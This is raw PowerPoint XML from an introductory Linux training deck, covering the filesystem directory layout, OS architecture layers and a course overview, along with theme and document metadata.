          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="3804139"/>
            <a:ext cx="1505431" cy="33969"/>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37" name="Straight Connector 36"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="3452965"/>
            <a:ext cx="1505424" cy="385143"/>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38" name="Straight Connector 37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="3101790"/>
            <a:ext cx="1505426" cy="736318"/>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39" name="Straight Connector 38"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2136886" y="3838108"/>
            <a:ext cx="1505429" cy="668382"/>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40" name="Straight Connector 39"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2136886" y="3838108"/>
            <a:ext cx="1505428" cy="1019557"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Straight Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2136886" y="3838108"/>
            <a:ext cx="1505429" cy="317207"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="Group 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5143951" y="819150"/>
            <a:ext cx="5930876" cy="5618803"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C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Essential user command </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>inaries</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099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Static files of Boot Loader</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45" name="Rectangle 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>
              <a:ext cx="964941" cy="403654"/>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Device files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46" name="Rectangle 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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Host-specific system configuration</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47" name="Rectangle 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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User home directories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48" name="Rectangle 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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Shared libraries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49" name="Rectangle 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FA0E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Mount point for removable</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> media</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50" name="Rectangle 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00206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Mount point for file systems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51" name="Rectangle 50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00DED9"/>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Add-on application software packages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52" name="Rectangle 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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System binaries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53" name="Rectangle 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC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Data for services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54" name="Rectangle 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="6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Temp files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55" name="Rectangle 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D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User utilities and applications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56" name="Rectangle 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763266"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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Variable files</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57" name="Rectangle 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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Home directory for root user</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58" name="Rectangle 57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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Virtual </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>filesystem</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> for Kernel</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3642310" y="819150"/>
            <a:ext cx="7432492" cy="5618803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225724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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332897084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Linux OS Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="793932" y="1621637"/>
            <a:ext cx="10725406" cy="4855493"/>
            <a:chOff x="793932" y="1597573"/>
            <a:chExt cx="10725406" cy="4855493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="793932" y="1597573"/>
              <a:ext cx="10725406" cy="1795867"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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A27C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="793932" y="4657199"/>
              <a:ext cx="10725406" cy="1795867"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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FFA27C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1082766" y="2495506"/>
              <a:ext cx="10147738" cy="721618"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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DATABASE,</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> WEB SERVER, NETWORK, MONITOR, ETC</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8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1082766" y="5553205"/>
              <a:ext cx="10147738" cy="721618"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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SCHEDULER,</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> DRIVERS, SECURITY, NETWORKING</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="793933" y="3453999"/>
              <a:ext cx="2538548" cy="1142641"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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LIBRARIES</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3548182" y="3459904"/>
              <a:ext cx="2538549" cy="1142641"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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SYSTEM DAEMONS</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6264485" y="3448094"/>
              <a:ext cx="2538549" cy="1142641"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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SHELLS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8980789" y="3453998"/>
              <a:ext cx="2538549" cy="1142641"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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rPr>
                <a:t>TOOLS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3704211" y="1782711"/>
              <a:ext cx="4765040" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Applications</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3774115" y="4669009"/>
              <a:ext cx="4765040" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Linux Kernel</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1805873755"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="CTI UNCLASSIFIED Nellis Mar 13">
  <a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000099"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFF00"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FF0000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="00FF00"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="AAAACA"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="DADADA"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FFAAAA"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="00E700"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="FF00FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FF9B03"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="CBD Unclassified Template Jul 06">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rgbClr val="FFA27C"/>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rgbClr val="FFA27C"/>
            </a:solidFill>
            <a:effectLst/>
            <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="CBD Unclassified Template Jul 06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BD Unclassified Template Jul 06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BD Unclassified Template Jul 06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BD Unclassified Template Jul 06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BD Unclassified Template Jul 06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BD Unclassified Template Jul 06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BD Unclassified Template Jul 06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Linked xmlns="8fe2a5b8-e29e-4a81-88af-c17cdf3700fa">false</Linke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94CF1871A8E364A8A2FE2AFBB0B197E" ma:contentTypeVersion="51" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="e3fbdc83529d92ddd15be03da1ce1139">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="8fe2a5b8-e29e-4a81-88af-c17cdf3700fa" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="4e2eebc537fbb4d3cb577a07957e1e5a" ns2:_="">
    <xsd:import namespace="8fe2a5b8-e29e-4a81-88af-c17cdf3700fa"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:Linked"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e2a5b8-e29e-4a81-88af-c17cdf3700fa" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="Linked" ma:index="8" nillable="true" ma:displayName="Link" ma:default="0" ma:description="Item is included in lesson manifest and displayed in CCMS" ma:internalName="Linked">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean"/>
      </xsd:simpleType>
    </xsd:element>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7ABEF6-3AB1-4E97-8262-51C44C936B04}">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8fe2a5b8-e29e-4a81-88af-c17cdf3700fa"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{307AB148-341B-43C5-BA43-67B60FBFB9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fe2a5b8-e29e-4a81-88af-c17cdf3700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79B3554-87D7-4256-94EA-727C2E7F5CF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11185</TotalTime>
  <Pages>15</Pages>
  <Words>12720</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1191</Paragraphs>
  <Slides>76</Slides>
  <Notes>76</Notes>
  <HiddenSlides>11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76</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="83" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Courier Std</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>CTI UNCLASSIFIED Nellis Mar 13</vt:lpstr>
      <vt:lpstr>Print Instructions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>So What?</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Review: What Is Linux?</vt:lpstr>
      <vt:lpstr>Review: Common Linux Uses</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
